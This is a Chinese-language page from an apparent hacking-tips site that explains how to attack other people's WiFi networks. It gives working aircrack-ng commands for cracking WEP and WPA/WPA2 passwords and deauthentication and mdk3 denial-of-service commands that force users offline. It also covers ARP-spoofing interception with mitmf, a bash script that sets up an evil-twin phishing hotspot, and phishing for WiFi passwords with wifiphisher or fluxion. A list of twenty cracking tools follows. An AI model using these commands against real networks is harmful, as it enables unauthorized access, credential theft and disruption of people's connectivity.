右侧
黑客技术
当前位置:网站首页 > 破解邮箱 > 正文

wifidos攻击软件_入侵wifi软件

作者:hacker发布时间:2022-12-29分类:破解邮箱浏览:99评论:5


导读:导航:1、怎么攻击别人wifi?2、无线网络中DOS攻击和DDOS攻击有什么具体区别吗?3、wifi渗透:DOS路由器,让坏蛋们断网2.04、用什么软件可以检测...

导航:

怎么攻击别人wifi?

1.保密性

我们攻击WIFI的第一个思路就是从保密性出发,我们希望从无线系统中获取用户的明文数据。首先,我们知道WIFI的的认证加密主要有以下四种方式:OPEN(无加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。

OPEN的WIFI没有采取认证加密措施,任意用户均可链接WIFI,用户数据在BSS(基本服务集)中明文传输,恶意用户没有任何门槛就可连接,然后通过中间人攻击即可获取用户的数据(SSL、SSH等需要其他工具)。如下图所示:

WEP、WPA、WPA2认证加密模式的WIFI需要破解获取密码,然后通过中间人或直接嗅探的方式获取用户明文数据。步骤就不详述了,WEP抓取IVS包,WPA/WPA2抓取handshake包。

WEP大概如下:

airodump-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕获ivs数据包

aireplay-ng -3 -b 目标AP的MAC -h 某一个连接该AP的station的MAC wlan1mon #发送ARP包获取加速获取ivs

aircrack-ng /workspace/sniff/airmon02.ivs

WPA/WPA2大概如下:

airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据,抓取handshake包

aireplay-ng -0 5 -a 目标AP的MAC -c 某一连接AP的station的MAC wlan1mon #发送deauth包,更快的获取handshake

aircrack-ng -w 你的字典文件 /workspace/sniff/airmon-wpa2.cap #破解wpa2密码

密码破解成功后即可连接AP,通过中间人的方式获取用户明文数据,或者直接用wireshark抓取加密包,然后通过airdecap-ng工具解密,然后用wireshark读取已经解密的数据包。

破解WPA、WPA2不一定成功,取决于你字典是否强大,此时我们可以想办法诱骗用户主动输入WIFI密码,比如我们创建一个和目标AP具有同样ESSID的软AP,用户可以连接上,单在浏览网页时会弹出一个虚假的认证页面,告诉用户必须输入WIFI的密码,用户只要输入密码我们即可获取。可以利用fluxion、wifiphisher等工具实现。

wifiphisher将用户输入的密码当做WIFI的密码,但此密码并没有去验证,如果用户输入错误,也会提示出该密码。

而fluxion会将用户输入的密码与handshake校验,成功方认为获取到密码。

2.可用性

通过使目标用户无法使用WIFI来破坏无线系统的可用性,通常通过DOS攻击来实现,比如发送大量的deauth包来迫使用户station与AP解除认证、连接。

aireplay -0 100 -a 目标AP的MAC -c攻击的station的MAC wlan1mon #发送大量的deauth包,迫使目标station无法连接AP

mdk3 wlan1mon a -a 攻击AP的MAC #mdk3可以伪造大量的station与AP连接,从而耗尽AP的资源造成DOS攻击

3.真实性

(1)恶意用户进入无线系统后,可通过中间人攻击获取或修改用户数据。

ARP欺骗或DNS欺骗,ettercap工具非常方便。下面采用mitmf工具通过ARP欺骗将目标浏览网页中的所有图片上下颠倒。

mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet

通过driftnet工具抓取目标浏览网页时的图片

driftnet -i wlan0

当然还可以利用中间人攻击做很多事情,比如获取cookie,嵌入js,结合beef进一步攻击等等。。。

(2)伪造AP进行钓鱼攻击

airbase -ng -e airmon wlan1mon #创建钓鱼热点

然后通过下面的脚本开启dhcp服务器(必须先安装isc-dhcp-server),开启路由,开启系统转发,开启防火墙nat等。

1 #!/bin/bash 2 3 echo '配置钓鱼热点...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待启动dhcp服务器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

此时用户可以不用密码即可连接airmon热点,并可以上网,但此时可以通过嗅探at0网卡获取用户数据。

4.完整性

篡改用户数据,在WIFI攻击这块貌似用处不大。

5.不可抵赖性

无线网络中DOS攻击和DDOS攻击有什么具体区别吗?

DoS是Denial of Service的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。

DDOS全名是Distributed Denial of service (分布式拒绝服务),很多DOS攻击源一起攻击某台服务器就组成了DDOS攻击,DDOS 最早可追溯到1996年最初,在中国2002年开始频繁出现,2003年已经初具规模。

通俗地说,DoS是单挑,DDoS更像群殴。

wifi渗透:DOS路由器,让坏蛋们断网2.0

上一篇用的是aireplay-ng来实施的DOS攻击,他是Aircrack下的一个命令,事实上还有一些办法,通过arp攻击也可以让他断网,可那就不是dos攻击手法了。这次的测试环境与上次一样, 这篇文章中现在只有第一种攻击方式有效,下面两种了解一下就可以了。

来看一下通过路由器上网前与路由器的验证过程

1.用虚拟机连接上网卡

2.输入ifconfig,查看是否挂载成功

出现wlan0即为挂载成功

3.输入airmon-ng start wlan0,调为监听模式

4.输入ifconfig查看是否成功

若最后一个wlan0变为wlan0mon即为成功

5.使用airodump-ng wlan0mon 查看周围无线路由器情况

记录受害者的BSSID,CH

6.mdk3 wlan0mon d -c 1[,6,11] [-w file1 -b file2]

其中各参数详情:

d:表示的是deauthentication/disassociation攻击模式

-c:针对的是无线网络工作频道,这里选择为4,我的测试路由器为@PHICOMM_10

-w:file白名单模式,w就是白名单的简写,即后跟文件中包含AP的MAC会在攻击中回避

-b:file黑名单模式,b就是黑名单的简写,即后跟预攻击目标AP的MAC列表

此时我输入mdk3 wlan0mon d -c 4

虽然看起来没什么反应,但实际上我的手机已经连接不上wifi了

注意:这里的攻击不对网线连接的客户端起作用,仅仅是对无线设备管用,而且只能是范围比较近的路由器起作用,前面的aireplay也是有一定范围限制的。

在无线路由器或者接入点内置一个列表即为连接状态表,里面可显示出所有与该AP建立连接的无线客户端状态。它试图通过利用大量模仿和伪造的无线客户端关联来填充AP的客户端关联表,从而达到淹没AP的目的。

由于开放身份验证(空身份验证)允许任何客户端通过身份验证后关联。利用这种漏洞的攻击者可以通过创建多个到达已连接或已关联的客户端来模仿很多客户端,从而淹没目标AP的客户端关联表。

攻击步骤:

简化一点,简化一点。

才开始的都一样,就最后一点不一样,刚刚是mdk3 wlan0mon d -c 4

4为信道,d为deauth攻击模式,-c为指定信道

现在是mdk3 wlan0mon a -a D8:C8:E9:1B:59:18

查看攻击效果

事实证明丝毫不受影响,但这只是我的斐讯路由器,不知道你们的是否管用

虽然不管用了,但这种空验证的攻击手法还是需要知道,毕竟有时候逛论坛仿佛看天书一样就很不爽了。

其中:

a:表示的是authentication DOS模式

-a:攻击指定的AP(路由器),此处输入的是AP的MAC地址

-s:发送数据包速率

当攻击成功后,指定的AP会有很多的不存在的无线站点与之联系。

与二相同,也是除最后一条命令不同外其余均相同

输入 mdk3 wlan0mon a -a D8:C8:E9:1B:59:18

手机畅行无阻。同样已经不管什么卵用了。

现在在与路由器的身份验证过程中,空连接等已经不管用了。

用什么软件可以检测wifi的安全性。

二十款免费WiFi黑客(渗透测试)工具

1. Aircrack

Aircrack是目前最流行的WiFi密码破解工具。市面上能破解 WiFi加密的工具有很多,不外乎利用WEP安全漏洞或者暴力字典攻击的方式破解WPA/WPA2 PSK密码。WPA2 AES/CCMP加密依然是相对安全的选择。如果采用WPA2 PSK模式,那么你的密码长度最好是13位以上混合字符。在你的Wi-Fi网络被入侵或者“蹭网”之前,最好先用破解工具自我攻击一下。 Aircrack是一个开源的WEP/WPA/WPA2 PSK破解工具,可以运行在windows、Mac OS X、Linux和OpenBSD上。可以下载到Vmware镜像文件或Live CD文件。

下载链接:

2. AirSnort

AirSnort是另外一款流行的WLAN密码破解工具,可以破解WEP秘钥。

下载链接:

3. Kismet

Kismet是一个开源的WiFi扫描器,包嗅探器和入侵政策系统,可以在windows、Mac OSX、Linux和BSD上运行。Kismet能显示AP详细信息,包括隐藏的SSID,还能捕获原始无线数据包,还可以将数据导入 Wireshark、TCPdump等工具进行分析。在windows环境,受驱动程序限制,Kismet只能与 CACE AirPcap无线网卡配合工作。但在Mac OSX和Linux上,Kismet可以兼容很多无线网卡。

Download Kismet:

4. Cain Able

Cain和Abel是windows上的密码恢复、破解和嗅探工具,可被用于展示如何从网络中嗅探明文密码。

下载链接:

5. WireShark

WireShark是当下非常流行的网络协议分析工具,关于最新的WireShark2.0版本的新功能的信息在这里。

Download Wireshark:

6. Fern WiFi Wireless Cracker

Fern是一款优秀的网络漏洞扫描和WLAN破解工具,可以破解获取WEP/WPA/WPS秘钥。Fren的开发工作从未停顿,而且专业版还提供更多强大功能。

下载链接:

7. CoWPAtty

CoWPAtty也是一款无线密码破解工具,新版预置了包含上千个流行SSID的17万个字典文件,大大提高了破解速度,类似国内的各种WiFi钥匙应用。

下载链接:

8. Airjack

Airjack是802.11包注入工具,过去曾被用来发起DOS或中间人攻击。

下载链接:

9. WepAttack

顾名思义,WepAttack也是一个802.11WEP秘钥破解工具,同时也是一个开源的Linux工具。

下载链接:

10. NetStumbler

NetStumbler是一个运行于Windows平台的无线密码破解工具。该工具已经很久未更新,无法兼容64位Windows版本,而且会被大多数无线入侵侦测工具发现,因此适合在家练手使用。

下载链接:

11. inSSIDer

inSSIDer是Windows和Mac平台上最流行的WiFi扫描工具,曾荣获最佳开源网络软件称号,不过目前已经转为收费版本(19.99美元)

下载链接:

12. Wifiphisher

开源无线安全工具

WiFiphiser是基于MIT许可模式的开源软件,运行于Kali Linux之上。

下载链接:

13. KisMac

一个类似Kismet的工具,面向Mac平台。

下载链接:

14. Reaver

如果你使用的是无线路由器,那么你需要注意去年底发现的一个安全漏洞:很多路由器厂商提供的WPS(一键认证模式,方便用户完成路由器设备连接认证)的 PIN码可以在数小时内被破解。Reaver就是这样一个工具,Reaver是一个Linux程序,能在4-10小时内暴力破解无线路由器的WPS PIN码和WPA/WPA2 PSK密码。Reaver还提供一个方便使用的专用硬件方案:Reaver Pro,有图形web操作界面。

15. Wifite

Wifite是一个很不错的无线密码破解工具,支持通过Reaver破解WPS秘钥,运行于Linux平台。

下载链接:

16. WepDecrypt

WepDecrypt是一款适合初学者的无线密码字典攻击工具,用C语言写成,但很久没有更新了。

下载链接:

17. OmniPeek

OmniPeek是一款网络包嗅探分析工具,属于Windows平台“独占”工具。需要使用者对网络协议和数据包有较深入的了解。

下载地址:

18. CloudCracker

顾名思义,CloudCracker是一款云端WiFi密码破解工具。

下载地址:

19. CommonView for Wi-Fi

CommonView是一款流行的额网络监控和包分析工具,最大特点是拥有GUI图形界面。

下载地址:

20. Pyrit

Pyrit也是一款优秀的WiFi密码暴力破解工具(WPA/WPA2-PSK)。运行于FreeBSD、MacOS和Linux平台。

下载地址:

标签:wifidos攻击软件


已有5位网友发表了看法:

  • 访客

    访客  评论于 2022-12-30 00:20:39  回复

    还可以利用中间人攻击做很多事情,比如获取cookie,嵌入js,结合beef进一步攻击等等。。。(2)伪造AP进行钓鱼攻击airbase -ng -e airmon wlan1mon #创建钓鱼热点然后通过下面的脚本开启dhc

  • 访客

    访客  评论于 2022-12-30 03:31:49  回复

    创建一个和目标AP具有同样ESSID的软AP,用户可以连接上,单在浏览网页时会弹出一个虚假的认证页面,告诉用户必须输入WIFI的密码,用户只要输入密码我们即可获取。可以利用fl

  • 访客

    访客  评论于 2022-12-30 01:22:59  回复

    和Abel是windows上的密码恢复、破解和嗅探工具,可被用于展示如何从网络中嗅探明文密码。下载链接: 5. WireSharkWireShark是当下非常流行的网络协议分析工具,关

  • 访客

    访客  评论于 2022-12-30 01:11:40  回复

    on02.ivsWPA/WPA2大概如下:airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据,抓取handshake包a

  • 访客

    访客  评论于 2022-12-30 02:21:04  回复

    。首先,我们知道WIFI的的认证加密主要有以下四种方式:OPEN(无加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。OPEN的WIFI没有采取认证加密措施,任意用户均可链接WIFI,用户数据在BSS(基本服务集)中明文传输,恶意用户没有任何门槛就可连接,然后通过中间人攻击即

欢迎 发表评论:

破解邮箱排行
最近发表
标签列表